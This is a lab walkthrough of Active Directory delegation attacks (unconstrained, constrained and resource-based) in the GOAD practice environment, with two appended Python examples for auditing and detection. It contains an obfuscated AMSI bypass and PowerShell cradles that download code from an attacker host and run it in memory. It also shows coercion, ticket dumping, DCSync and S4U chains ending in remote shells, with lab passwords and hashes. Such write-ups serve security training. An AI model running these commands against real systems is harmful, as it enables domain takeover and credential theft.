GOAD-delegations

GOAD – part 10 – Delegations

Now let's try some delegation attacks. Here I will just demonstrate the exploitation; if you want to understand the delegation concept and go further, you should read the following articles, which are really awesome:

Delegations

  • There are three types of delegation in Active Directory:
    • Unconstrained delegation
    • Constrained delegation
    • Resource-based constrained delegation
  • In this blog post we will exploit all three of them.

Unconstrained delegation

  • One way to find unconstrained delegation is to look in BloodHound:

MATCH (c {unconstraineddelegation:true}) return c

By default in Active Directory, all domain controllers are set up with unconstrained delegation.

If you want to search for systems with unconstrained delegation other than domain controllers:

MATCH (c1:Computer)-[:MemberOf*1..]->(g:Group) WHERE g.objectid ENDS WITH '-516' WITH COLLECT(c1.name) AS domainControllers MATCH (c2 {unconstraineddelegation:true}) WHERE NOT c2.name IN domainControllers RETURN c2
  • In the Windows GUI it looks like this:

Exploit

  • The simplest way to exploit unconstrained delegation is from Windows with Rubeus.
  • We open an RDP connection to Winterfell.

xfreerdp /d:north.sevenkingdoms.local /u:eddard.stark /p:'FightP3aceAndHonor!' /v:192.168.56.11 /cert-ignore

In the previous step we already owned the north domain, so let's say we got Eddard's password.
Eddard's password came in cleartext when running DonPAPI on Winterfell, because a scheduled task runs as this user.

  • From there we will bypass AMSI and launch Rubeus in memory (just like in part 8).

Of course we could stop the Defender antivirus on the server, but on a real pentest you don't want to do that on your customer's servers.

  • Prepare the server hosting Rubeus.exe and our AMSI bypass:

python3 -m http.server 8080
  • On the RDP session, bypass AMSI:

$x=[Ref].Assembly.GetType('System.Management.Automation.Am'+'siUt'+'ils');$y=$x.GetField('am'+'siCon'+'text',[Reflection.BindingFlags]'NonPublic,Static');$z=$y.GetValue($null);[Runtime.InteropServices.Marshal]::WriteInt32($z,0x41424344)
(new-object system.net.webclient).downloadstring('http://192.168.56.1/amsi_rmouse.txt')|IEX

The above was not working in 2026, so I used the following for the AMSI bypass:

PS C:\Windows\system32> (new-object system.net.webclient).downloadstring('http://192.168.56.1/amsibypass2026.txt')|IEX 

PS C:\Windows\system32> (new-object system.net.webclient).downloadstring('http://192.168.56.1/amsi_rmouse.txt')|IEX
PS C:\Windows\system32> $data = (New-Object System.Net.WebClient).DownloadData('http://192.168.56.1/Rubeus.exe') 
PS C:\Windows\system32> $assem = [System.Reflection.Assembly]::Load($data);
PS C:\Windows\system32> [Rubeus.Program]::MainString("triage");

  • Now launch Rubeus in memory with execute-assembly.
  • First we will list the available tickets:

$data = (New-Object System.Net.WebClient).DownloadData('http://192.168.56.1/Rubeus.exe')
$assem = [System.Reflection.Assembly]::Load($data);
[Rubeus.Program]::MainString("triage");

  • And now coerce the DC kingslanding into authenticating to the DC winterfell.

I used the printerbug [ ms-rprn.exe \\kingslanding \\winterfell ] to force the coercion:
c:\tmp>ms-rprn.exe
Usage: ms-rprn.exe \\targetserver \\CaptureServer

c:\tmp>hostname
winterfell

c:\tmp>ms-rprn.exe \\kingslanding \\winterfell
Attempted printer notification and received an invalid handle. The coerced authentication probably worked!

c:\tmp>ms-rprn.exe \\kingslanding \\winterfell
Attempted printer notification and received an invalid handle. The coerced authentication probably worked!

c:\tmp>

python3 coercer.py -u arya.stark -d north.sevenkingdoms.local -p Needle -t kingslanding.sevenkingdoms.local -l winterfell
  • We look at the triage again:

[Rubeus.Program]::MainString("triage")
  • And now the TGT of kingslanding is present.

  • To extract it, relaunch coercer and one second later launch the following dump command (I don't know why, but the Rubeus monitor mode doesn't want to run in execute-assembly):

[Rubeus.Program]::MainString("dump /user:kingslanding$ /service:krbtgt /nowrap");

PS C:\Windows\system32> (new-object system.net.webclient).downloadstring('http://192.168.56.1/amsibypass2026.txt')|IEX
PS C:\Windows\system32> $data = (New-Object System.Net.WebClient).DownloadData('http://192.168.56.1/Rubeus.exe')
PS C:\Windows\system32> $assem = [System.Reflection.Assembly]::Load($data);
PS C:\Windows\system32> [Rubeus.Program]::MainString("triage");

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.3.3


Action: Triage Kerberos Tickets (All Users)

[*] Current LUID    : 0x625896

 --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 | LUID      | UserName                                 | Service                                                                                             | EndTime               |
 --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 | 0x1061204 | WINTERFELL$ @ NORTH.SEVENKINGDOMS.LOCAL  | ldap/winterfell.north.sevenkingdoms.local                                                           | 4/24/2026 12:47:53 AM |
 | 0x105c7ee | WINTERFELL$ @ NORTH.SEVENKINGDOMS.LOCAL  | ldap/winterfell.north.sevenkingdoms.local                                                           | 4/24/2026 12:47:53 AM |
 | 0x19c006  | WINTERFELL$ @ NORTH.SEVENKINGDOMS.LOCAL  | GC/winterfell.north.sevenkingdoms.local/sevenkingdoms.local                                         | 4/23/2026 3:17:30 PM  |
 | 0xbae02   | WINTERFELL$ @ NORTH.SEVENKINGDOMS.LOCAL  | LDAP/winterfell.north.sevenkingdoms.local/north.sevenkingdoms.local                                 | 4/23/2026 3:17:30 PM  |
 | 0xbadc5   | WINTERFELL$ @ NORTH.SEVENKINGDOMS.LOCAL  | ldap/winterfell.north.sevenkingdoms.local                                                           | 4/23/2026 3:17:30 PM  |
 | 0x3546a   | WINTERFELL$ @ NORTH.SEVENKINGDOMS.LOCAL  | LDAP/winterfell.north.sevenkingdoms.local/north.sevenkingdoms.local                                 | 4/23/2026 3:17:30 PM  |
 | 0x3e4     | winterfell$ @ NORTH.SEVENKINGDOMS.LOCAL  | krbtgt/NORTH.SEVENKINGDOMS.LOCAL                                                                    | 4/23/2026 3:27:14 PM  |
 | 0x3e4     | winterfell$ @ NORTH.SEVENKINGDOMS.LOCAL  | ldap/winterfell.north.sevenkingdoms.local/north.sevenkingdoms.local                                 | 4/24/2026 1:12:13 AM  |
 | 0x3e4     | winterfell$ @ NORTH.SEVENKINGDOMS.LOCAL  | ldap/winterfell.north.sevenkingdoms.local                                                           | 4/24/2026 1:12:13 AM  |
 | 0x3e4     | winterfell$ @ NORTH.SEVENKINGDOMS.LOCAL  | DNS/winterfell.north.sevenkingdoms.local                                                            | 4/23/2026 3:27:14 PM  |
 | 0x1af7e36 | KINGSLANDING$ @ SEVENKINGDOMS.LOCAL      | E3514235-4B06-11D1-AB04-00C04FC2DCD2/ec766ab6-b591-43d8-b0eb-11b676c95388/north.sevenkingdoms.local | 4/24/2026 12:09:28 AM |
 | 0x1061429 | WINTERFELL$ @ NORTH.SEVENKINGDOMS.LOCAL  | ldap/winterfell.north.sevenkingdoms.local                                                           | 4/24/2026 12:47:53 AM |
 | 0x625896  | eddard.stark @ NORTH.SEVENKINGDOMS.LOCAL | krbtgt/NORTH.SEVENKINGDOMS.LOCAL                                                                    | 4/24/2026 3:19:36 AM  |
 | 0x3e7     | winterfell$ @ NORTH.SEVENKINGDOMS.LOCAL  | krbtgt/SEVENKINGDOMS.LOCAL                                                                          | 4/24/2026 12:47:53 AM |
 | 0x3e7     | winterfell$ @ NORTH.SEVENKINGDOMS.LOCAL  | cifs/kingslanding.sevenkingdoms.local                                                               | 4/24/2026 12:47:53 AM |
 | 0x3e7     | winterfell$ @ NORTH.SEVENKINGDOMS.LOCAL  | LDAP/WINTERFELL                                                                                     | 4/24/2026 12:47:53 AM |
 | 0x3e7     | winterfell$ @ NORTH.SEVENKINGDOMS.LOCAL  | E3514235-4B06-11D1-AB04-00C04FC2DCD2/aa41aee0-dc0d-4032-a00f-000674c83732/sevenkingdoms.local       | 4/24/2026 12:47:53 AM |
 | 0x3e7     | winterfell$ @ NORTH.SEVENKINGDOMS.LOCAL  | ldap/kingslanding.sevenkingdoms.local                                                               | 4/24/2026 12:47:53 AM |
 | 0x3e7     | winterfell$ @ NORTH.SEVENKINGDOMS.LOCAL  | cifs/WINTERFELL                                                                                     | 4/24/2026 12:47:53 AM |
 | 0x3e7     | winterfell$ @ NORTH.SEVENKINGDOMS.LOCAL  | ldap/winterfell.north.sevenkingdoms.local                                                           | 4/24/2026 12:47:53 AM |
 | 0x3e7     | winterfell$ @ NORTH.SEVENKINGDOMS.LOCAL  | cifs/winterfell.north.sevenkingdoms.local/north.sevenkingdoms.local                                 | 4/24/2026 12:47:53 AM |
 | 0x3e7     | winterfell$ @ NORTH.SEVENKINGDOMS.LOCAL  | WINTERFELL$                                                                                         | 4/24/2026 12:47:53 AM |
 | 0x3e7     | winterfell$ @ NORTH.SEVENKINGDOMS.LOCAL  | ldap/winterfell.north.sevenkingdoms.local/north.sevenkingdoms.local                                 | 4/24/2026 12:47:53 AM |
 | 0x3e7     | winterfell$ @ NORTH.SEVENKINGDOMS.LOCAL  | GC/winterfell.north.sevenkingdoms.local/sevenkingdoms.local                                         | 4/23/2026 3:17:30 PM  |
 | 0x3e7     | winterfell$ @ NORTH.SEVENKINGDOMS.LOCAL  | cifs/winterfell.north.sevenkingdoms.local                                                           | 4/23/2026 3:17:30 PM  |
 --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------



PS C:\Windows\system32> [Rubeus.Program]::MainString("dump /user:kingslanding$ /service:krbtgt /nowrap");

Action: Dump Kerberos Ticket Data (All Users)

[*] Target service  : krbtgt
[*] Target user     : kingslanding$
[*] Current LUID    : 0x625896


PS C:\Windows\system32> [Rubeus.Program]::MainString("dump /user:kingslanding$ /service:krbtgt /nowrap");

Action: Dump Kerberos Ticket Data (All Users)

[*] Target service  : krbtgt
[*] Target user     : kingslanding$
[*] Current LUID    : 0x625896

  UserName                 : KINGSLANDING$
  Domain                   : SEVENKINGDOMS
  LogonId                  : 0x1d3c813
  UserSID                  : S-1-5-21-3008081783-3975149589-1763115855-1001
  AuthenticationPackage    : Kerberos
  LogonType                : Network
  LogonTime                : 4/24/2026 1:23:29 AM
  LogonServer              :
  LogonServerDNSDomain     : SEVENKINGDOMS.LOCAL
  UserPrincipalName        :


    ServiceName              :  krbtgt/SEVENKINGDOMS.LOCAL
    ServiceRealm             :  SEVENKINGDOMS.LOCAL
    UserName                 :  KINGSLANDING$ (NT_PRINCIPAL)
    UserRealm                :  SEVENKINGDOMS.LOCAL
    StartTime                :  4/23/2026 11:40:45 PM
    EndTime                  :  4/24/2026 9:40:45 AM
    RenewTill                :  4/30/2026 11:40:45 PM
    Flags                    :  name_canonicalize, pre_authent, renewable, forwarded, forwardable
    KeyType                  :  aes256_cts_hmac_sha1
    Base64(key)              :  i5RHTYnqmLavDM67pQhGgcDoTM6p+qs0bJOKXvL9SLg=
    Base64EncodedTicket   :

PS C:\Windows\system32>

  • We now have the TGT of the domain controller.
  • Let's continue on Linux to pass the ticket and launch a DCSync with secretsdump:
    • copy the ticket without spaces and line breaks (in vim I do: :%s/\s*\n\s*//g)
    • convert the ticket to ccache
    • use the Kerberos ticket and launch secretsdump

cat tgt.b64|base64 -d > ticket.kirbi
ticketConverter.py ticket.kirbi ticket.ccache
export KRB5CCNAME=/workspace/unconstrained/ticket.ccache
secretsdump.py -k -no-pass SEVENKINGDOMS.LOCAL/'KINGSLANDING$'@KINGSLANDING

┌──(bolke㉿kali)-[~/htb]
└─$ cat tgt.b64|base64 -d > ticket.kirbi

┌──(bolke㉿kali)-[~/htb]
└─$ impacket-ticketConverter ticket.kirbi ticket.ccache
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies

[*] converting kirbi to ccache...
[+] done

┌──(bolke㉿kali)-[~/htb]
└─$ export KRB5CCNAME=ticket.ccache

┌──(bolke㉿kali)-[~/htb]
└─$ klist
Ticket cache: FILE:ticket.ccache
Default principal: KINGSLANDING$@SEVENKINGDOMS.LOCAL

Valid starting       Expires              Service principal
04/24/2026 08:40:45  04/24/2026 18:40:45  krbtgt/SEVENKINGDOMS.LOCAL@SEVENKINGDOMS.LOCAL
        renew until 05/01/2026 08:40:45

┌──(bolke㉿kali)-[~/htb]
└─$ impacket-secretsdump -k -no-pass SEVENKINGDOMS.LOCAL/'KINGSLANDING$'@KINGSLANDING
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies

[-] Policy SPN target name validation might be restricting full DRSUAPI dump. Try -just-dc-user
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
[*] Cleaning up...

Another way to exploit this is to do a pass-the-ticket with Rubeus and launch a DCSync with Mimikatz, but this implies running Mimikatz on Winterfell and bypassing the Defender AV.

In case you didn't notice, the unconstrained delegation abuse was exploited here to pass from the child domain to the parent domain 😉

Constrained Delegation

  • Find constrained delegation with BloodHound:

MATCH p=(u)-[:AllowedToDelegate]->(c) RETURN p

Remark: SharpHound does not seem to capture the constrained delegation without protocol transition in the lab.

  • Find all the constrained delegations with impacket:

findDelegation.py NORTH.SEVENKINGDOMS.LOCAL/arya.stark:Needle -target-domain north.sevenkingdoms.local
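The Cypher queries above and the findDelegation.py run answer the same question from LDAP data. As an added example (not code from the GOAD post or project), this Python classifier does that classification directly from the userAccountControl bits and the two delegation attributes, so it also separates Kerberos-only constrained delegation, which the remark above says SharpHound missed in the lab; the entries are constructed to mirror the lab objects, and the bytes standing in for the RBCD security descriptor are a placeholder.

```python
"""Classify AD accounts by Kerberos delegation type from their LDAP attributes.

Added example, not code from the GOAD post or project. The entries below are
constructed to mirror the lab objects the post talks about; the byte string
standing in for the RBCD security descriptor is a placeholder, not a real one.
"""
from typing import Dict, List

# userAccountControl bits (MS-SAMR / MS-ADTS)
TRUSTED_FOR_DELEGATION = 0x80000            # unconstrained delegation
TRUSTED_TO_AUTH_FOR_DELEGATION = 0x1000000  # constrained delegation WITH protocol transition
DOMAIN_CONTROLLERS_RID = 516                # primaryGroupID of DC accounts (the "-516" of the Cypher query)

UNCONSTRAINED_DC = "unconstrained (domain controller, default)"
UNCONSTRAINED_NON_DC = "unconstrained on a NON-DC account"
CONSTRAINED_PT = "constrained with protocol transition"
CONSTRAINED_KERB_ONLY = "constrained, Kerberos only (no protocol transition)"
RBCD_INBOUND = "rbcd: msDS-AllowedToActOnBehalfOfOtherIdentity is set"


def exposed_hosts(spns: List[str]) -> List[str]:
    """Hosts reachable through a msDS-AllowedToDelegateTo list.

    The service class of the ticket can be swapped (the /altservice trick in the
    post), so a delegation to HTTP/winterfell exposes every service on winterfell.
    The finding is therefore reported per host, not per SPN.
    """
    hosts: List[str] = []
    for spn in spns:
        host = spn.split("/", 1)[1].split(":")[0].lower() if "/" in spn else spn.lower()
        if host not in hosts:
            hosts.append(host)
    return hosts


def classify(entry: dict) -> List[str]:
    """Return the delegation findings for one LDAP entry (empty list = none)."""
    uac = int(entry.get("userAccountControl", 0))
    is_dc = entry.get("primaryGroupID") == DOMAIN_CONTROLLERS_RID
    findings: List[str] = []

    if uac & TRUSTED_FOR_DELEGATION:
        findings.append(UNCONSTRAINED_DC if is_dc else UNCONSTRAINED_NON_DC)

    targets = entry.get("msDS-AllowedToDelegateTo") or []
    if targets:
        kind = CONSTRAINED_PT if uac & TRUSTED_TO_AUTH_FOR_DELEGATION else CONSTRAINED_KERB_ONLY
        findings.append(f"{kind} -> hosts {', '.join(exposed_hosts(targets))}")
    elif uac & TRUSTED_TO_AUTH_FOR_DELEGATION:
        # Protocol transition enabled but no target list: not a normal state, worth a look.
        findings.append("TRUSTED_TO_AUTH_FOR_DELEGATION set without msDS-AllowedToDelegateTo")

    if entry.get("msDS-AllowedToActOnBehalfOfOtherIdentity"):
        findings.append(RBCD_INBOUND + (" on a DOMAIN CONTROLLER" if is_dc else ""))
    return findings


def audit(entries: List[dict]) -> Dict[str, List[str]]:
    """Map sAMAccountName -> findings for every entry that has at least one."""
    report: Dict[str, List[str]] = {}
    for e in entries:
        found = classify(e)
        if found:
            report[e["sAMAccountName"]] = found
    return report


# Constructed entries mirroring the lab objects mentioned in the post.
LAB_ENTRIES = [
    # Domain controllers: SERVER_TRUST_ACCOUNT (0x2000) | TRUSTED_FOR_DELEGATION (0x80000)
    {"sAMAccountName": "WINTERFELL$", "userAccountControl": 0x82000, "primaryGroupID": 516},
    {"sAMAccountName": "KINGSLANDING$", "userAccountControl": 0x82000, "primaryGroupID": 516,
     # placeholder bytes standing for the descriptor rbcd.py writes for rbcd$ (constructed)
     "msDS-AllowedToActOnBehalfOfOtherIdentity": b"\x01\x00\x04\x80<constructed>"},
    # castelblack$: Kerberos-only constrained delegation as added by the playbook in the post
    {"sAMAccountName": "CASTELBLACK$", "userAccountControl": 0x1000, "primaryGroupID": 515,
     "msDS-AllowedToDelegateTo": ["HTTP/winterfell.north.sevenkingdoms.local", "HTTP/winterfell"]},
    # jon.snow: NORMAL_ACCOUNT | TRUSTED_TO_AUTH_FOR_DELEGATION, the protocol-transition case
    {"sAMAccountName": "jon.snow", "userAccountControl": 0x1000200, "primaryGroupID": 513,
     "msDS-AllowedToDelegateTo": ["CIFS/winterfell"]},
    # arya.stark: plain user, no delegation at all
    {"sAMAccountName": "arya.stark", "userAccountControl": 0x200, "primaryGroupID": 513},
]

if __name__ == "__main__":
    for name, findings in audit(LAB_ENTRIES).items():
        print(name)
        for f in findings:
            print("   -", f)
```

Feeding it real data is a matter of replacing LAB_ENTRIES with the result of an LDAP search returning the three attributes used above.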

With protocol transition

  • To abuse constrained delegation with protocol transition, the concept is to first request a TGT for the user, then execute an S4U2Self followed by an S4U2Proxy to impersonate an admin user to the SPN on the target.
  • From Windows with Rubeus:

.\Rubeus.exe asktgt /user:jon.snow /domain:north.sevenkingdoms.local /rc4:B8D76E56E9DAC90539AFF05E3CCB1755
.\Rubeus.exe s4u /ticket:put_the_previous_ticket_here /impersonateuser:administrator /msdsspn:CIFS/winterfell /ptt
  • From Linux with impacket:

getST.py -spn 'CIFS/winterfell' -impersonate Administrator -dc-ip '192.168.56.11' 'north.sevenkingdoms.local/jon.snow:iknownothing'
  • Next we can use the TGS to connect to SMB and get a shell with psexec, smbexec, wmiexec, …

A good thing to know is that the SPN part is not encrypted in the request, so you can change it to the one you want with the following options:

  • on rubeus : /altservice
  • on impacket : -altservice

SPN lists: Carlos Polop (HackTricks) gives us a useful list of the common SPNs and their usage on his silver ticket page.

Without protocol transition

  • The constrained delegation without protocol transition was not present originally in the lab, but you can add it with the following command:

sudo docker run -ti --rm --network host -h goadansible -v $(pwd):/goad -w /goad/ansible goadansible ansible-playbook vulnerabilities.yml -l dc02 --tags "data,constrained_delegation_kerb"
  • Or you could add it by hand with these PowerShell commands:

Set-ADComputer -Identity "castelblack$" -ServicePrincipalNames @{Add='HTTP/winterfell.north.sevenkingdoms.local'}
Set-ADComputer -Identity "castelblack$" -Add @{'msDS-AllowedToDelegateTo'=@('HTTP/winterfell.north.sevenkingdoms.local','HTTP/winterfell')}
  • This results in the following in the Windows GUI:

The self-RBCD trick doesn't work anymore. When I was writing this article I tried the self-RBCD without success many times. After multiple tries and failures I asked Charlie (@_nwodtuhs) what I was doing wrong, because I couldn't find out why it didn't work as expected. He explained to me that the self-RBCD trick doesn't work anymore and has been silently patched by Microsoft :'(

  • To exploit the constrained delegation here, we only need a forwardable TGS as administrator for any service on castelblack.
  • But if we do an S4U (S4U2Self + S4U2Proxy) like we did with protocol transition, S4U2Self will return a non-forwardable TGS and the attack will fail.
  • So to get the forwardable TGS we need, we first add a computer and set up RBCD between the created computer (rbcd_const$) and the computer that has the delegation set (here castelblack$).
  • By doing that, we can do an S4U2Self followed by an S4U2Proxy on the added computer, and the result is a forwardable TGS for host/castelblack as administrator.
  • Once that is done, we have the forwardable ticket to pass to S4U2Proxy, and we can even change the requested service with -altservice:

# add computer X (rbcd_const)
addcomputer.py -computer-name 'rbcd_const$' -computer-pass 'rbcdpass' -dc-host 192.168.56.11 'north.sevenkingdoms.local/arya.stark:Needle'

# add rbcd from X (rbcd_const) to constrained (castelblack)
rbcd.py -delegate-from 'rbcd_const$' -delegate-to 'castelblack$' -dc-ip 192.168.56.11 -action 'write' -hashes ':b52ee55ea1b9fb81de8c4f0064fa9301' north.sevenkingdoms.local/'castelblack$'
  • Do the S4U2Self followed by the S4U2Proxy on castelblack (this is the classic RBCD attack):

# s4u2self on X (rbcd_const)
getST.py -self -impersonate "administrator" -dc-ip 192.168.56.11  north.sevenkingdoms.local/'rbcd_const$':'rbcdpass'

# s4u2proxy from X (rbcd_const) to constrained (castelblack)
getST.py -impersonate "administrator" -spn "host/castelblack" -additional-ticket 'administrator@rbcd_const$@NORTH.SEVENKINGDOMS.LOCAL.ccache' -dc-ip 192.168.56.11  north.sevenkingdoms.local/'rbcd_const$':'rbcdpass'
  • You could also do the two (S4U2Self + S4U2Proxy) in one command:

getST.py -spn 'host/castelblack' -impersonate Administrator -dc-ip 192.168.56.11 north.sevenkingdoms.local/'rbcd_const$':'rbcdpass'
  • And launch the S4U2Proxy with the forwardable ticket:

# s4u2proxy from constrained (castelblack) to target (winterfell) - with altservice to change the SPN in use
getST.py -impersonate "administrator" -spn "http/winterfell" -altservice "cifs/winterfell" -additional-ticket 'administrator@host_castelblack@NORTH.SEVENKINGDOMS.LOCAL.ccache' -dc-ip 192.168.56.11 -hashes ':b52ee55ea1b9fb81de8c4f0064fa9301' north.sevenkingdoms.local/'castelblack$'

export KRB5CCNAME=/workspace/administrator@cifs_winterfell@NORTH.SEVENKINGDOMS.LOCAL.ccache 
wmiexec.py -k -no-pass north.sevenkingdoms.local/administrator@winterfell

  • After the exploit, a little cleanup of the lab: flush the RBCD entry and delete the computer account with a domain admin:

rbcd.py -delegate-to 'castelblack$' -delegate-from 'rbcd_const$' -dc-ip 192.168.56.11 -action 'flush' -hashes ':b52ee55ea1b9fb81de8c4f0064fa9301' north.sevenkingdoms.local/'castelblack$'
addcomputer.py -computer-name 'rbcd_const$' -computer-pass 'rbcdpass' -dc-host 192.168.56.11 'north.sevenkingdoms.local/eddard.stark:FightP3aceAndHonor!' -delete

Resource Based Constrained Delegation

  • Resource-Based Constrained Delegation (RBCD)
  • You can abuse RBCD when you can edit the attribute msDS-AllowedToActOnBehalfOfOtherIdentity.

A computer account can edit its own msDS-AllowedToActOnBehalfOfOtherIdentity attribute. This is useful when you do an NTLM relay to LDAPS (like in the drop-the-mic attack path): you can then edit the computer attribute and launch an RBCD exploitation.

  • An example of exploitation is when you have a GenericAll or GenericWrite ACL on a computer.
  • You can find this in the lab when you look at the ACLs on users.

  • We can see that stannis.baratheon has GenericWrite on kingslanding.
  • The RBCD exploitation happens with the following commands:
  • Create a computer X (rbcd$):

addcomputer.py -computer-name 'rbcd$' -computer-pass 'rbcdpass' -dc-host kingslanding.sevenkingdoms.local 'sevenkingdoms.local/stannis.baratheon:Drag0nst0ne'
  • Add the delegation from X (rbcd$) to our target (write the attribute):

rbcd.py -delegate-from 'rbcd$' -delegate-to 'kingslanding$' -dc-ip 'kingslanding.sevenkingdoms.local' -action 'write' sevenkingdoms.local/stannis.baratheon:Drag0nst0ne
  • Now X (rbcd$) has delegation rights on our target, so we can do an S4U2Self query followed by an S4U2Proxy.
  • This will result in administrator permissions on kingslanding:

getST.py -spn 'cifs/kingslanding.sevenkingdoms.local' -impersonate Administrator -dc-ip 'kingslanding.sevenkingdoms.local' 'sevenkingdoms.local/rbcd$:rbcdpass'

export KRB5CCNAME=/workspace/rbcd/Administrator@cifs_kingslanding.sevenkingdoms.local@SEVENKINGDOMS.LOCAL.ccache
wmiexec.py -k -no-pass @kingslanding.sevenkingdoms.local

  • After the exploit, a little cleanup of the lab: flush the RBCD entry and delete the computer account with a domain admin:

rbcd.py -delegate-from 'rbcd$' -delegate-to 'kingslanding$' -dc-ip 'kingslanding.sevenkingdoms.local' -action 'flush' sevenkingdoms.local/stannis.baratheon:Drag0nst0ne
addcomputer.py -computer-name 'rbcd$' -computer-pass 'rbcdpass' -dc-host kingslanding.sevenkingdoms.local 'sevenkingdoms.local/cersei.lannister:il0vejaime' -delete
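From the blue side of the constrained and RBCD sections: the addcomputer.py, rbcd.py (or Set-ADComputer) and getST.py steps each leave a trace in the Security log, namely 4741, 5136 on the delegation attribute (4742 with AllowedToDelegateTo for the classic variant) and 4769 with TransitedServices filled in, which only happens for S4U2Proxy. As an added example (not code from the GOAD post or project), the detector below runs those rules over constructed JSON event lines that use the lab names, and escalates when the S4U2Proxy requester is a machine account created shortly before.

```python
"""Flag the delegation-abuse footprints of this post in Windows Security events.

Added example, not code from the GOAD post or project. The events are constructed
JSON lines (as a WEF/Sysmon-style forwarder would ship them) using the lab names
from the post; field names follow the Windows event XML (SubjectUserName,
AttributeLDAPDisplayName, TransitedServices, AllowedToDelegateTo, ...).
"""
import json
from datetime import datetime, timedelta
from typing import Dict, List

# Attributes whose modification (5136) grants a delegation: RBCD and classic constrained.
DELEGATION_ATTRS = {"msDS-AllowedToActOnBehalfOfOtherIdentity", "msDS-AllowedToDelegateTo"}
# A machine account created and then used for S4U2Proxy within this window is the
# addcomputer.py -> rbcd.py -> getST.py chain of the post.
CORRELATION_WINDOW = timedelta(hours=1)


def _when(event: dict) -> datetime:
    return datetime.fromisoformat(event["TimeCreated"])


def detect(events: List[dict]) -> List[Dict[str, str]]:
    """Return alerts {"severity", "rule", "message"} for delegation-related events, oldest first."""
    alerts: List[Dict[str, str]] = []
    created: Dict[str, tuple] = {}  # machine account -> (creator, creation time), from 4741
    for e in sorted(events, key=_when):
        eid = e["EventID"]
        if eid == 4741:  # computer account created (MachineAccountQuota lets any user do this)
            acct = e["TargetUserName"].upper()
            created[acct] = (e["SubjectUserName"], _when(e))
            alerts.append({"severity": "medium", "rule": "machine_account_created",
                           "message": f"{acct} created by {e['SubjectUserName']}"})
        elif eid == 5136 and e.get("AttributeLDAPDisplayName") in DELEGATION_ATTRS:
            alerts.append({"severity": "high", "rule": "delegation_attribute_write",
                           "message": f"{e['SubjectUserName']} wrote {e['AttributeLDAPDisplayName']} on {e['ObjectDN']}"})
        elif eid == 4742 and e.get("AllowedToDelegateTo", "-") != "-":
            alerts.append({"severity": "high", "rule": "constrained_delegation_changed",
                           "message": f"{e['TargetUserName']} AllowedToDelegateTo -> {e['AllowedToDelegateTo']}"})
        elif eid == 4769 and e.get("TransitedServices", "-") != "-":
            # TransitedServices is only populated for S4U2Proxy: the listed account asked
            # the KDC for a ticket to ServiceName on behalf of TargetUserName.
            proxy = e["TransitedServices"].split("@")[0].upper()
            alert = {"severity": "high", "rule": "s4u2proxy",
                     "message": f"{proxy} obtained a {e['ServiceName']} ticket as {e['TargetUserName']}"}
            origin = created.get(proxy)
            if origin and _when(e) - origin[1] <= CORRELATION_WINDOW:
                alert["severity"] = "critical"
                alert["message"] += f" (account created by {origin[0]} {_when(e) - origin[1]} earlier)"
            alerts.append(alert)
    return alerts


def load_events(lines: List[str]) -> List[dict]:
    return [json.loads(line) for line in lines if line.strip()]


# Constructed events, one JSON object per line, in the order the post's RBCD and
# constrained-delegation sections would produce them (timestamps are made up).
SAMPLE_EVENTS = r"""
{"EventID": 4741, "TimeCreated": "2026-04-24T10:00:00", "SubjectUserName": "stannis.baratheon", "TargetUserName": "rbcd$"}
{"EventID": 5136, "TimeCreated": "2026-04-24T10:00:30", "SubjectUserName": "stannis.baratheon", "ObjectDN": "CN=KINGSLANDING,OU=Domain Controllers,DC=sevenkingdoms,DC=local", "AttributeLDAPDisplayName": "msDS-AllowedToActOnBehalfOfOtherIdentity"}
{"EventID": 4769, "TimeCreated": "2026-04-24T10:01:00", "TargetUserName": "Administrator@SEVENKINGDOMS.LOCAL", "ServiceName": "KINGSLANDING$", "TransitedServices": "rbcd$@SEVENKINGDOMS.LOCAL"}
{"EventID": 4769, "TimeCreated": "2026-04-24T10:02:00", "TargetUserName": "arya.stark@NORTH.SEVENKINGDOMS.LOCAL", "ServiceName": "WINTERFELL$", "TransitedServices": "-"}
{"EventID": 4742, "TimeCreated": "2026-04-24T11:30:00", "SubjectUserName": "eddard.stark", "TargetUserName": "CASTELBLACK$", "AllowedToDelegateTo": "HTTP/winterfell.north.sevenkingdoms.local, HTTP/winterfell"}
{"EventID": 4769, "TimeCreated": "2026-04-24T11:40:00", "TargetUserName": "administrator@NORTH.SEVENKINGDOMS.LOCAL", "ServiceName": "WINTERFELL$", "TransitedServices": "jon.snow@NORTH.SEVENKINGDOMS.LOCAL"}
""".strip().splitlines()

if __name__ == "__main__":
    for a in detect(load_events(SAMPLE_EVENTS)):
        print(f"[{a['severity']:8}] {a['rule']}: {a['message']}")
```

The ordinary TGS request by arya.stark produces no alert, and jon.snow's S4U2Proxy stays at high rather than critical because no 4741 precedes it: an account that legitimately holds protocol transition still deserves review, but not the same urgency as a freshly created one.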

Resources – go further

Next time we will have fun with ACLs (GOAD pwning part 11) 🙂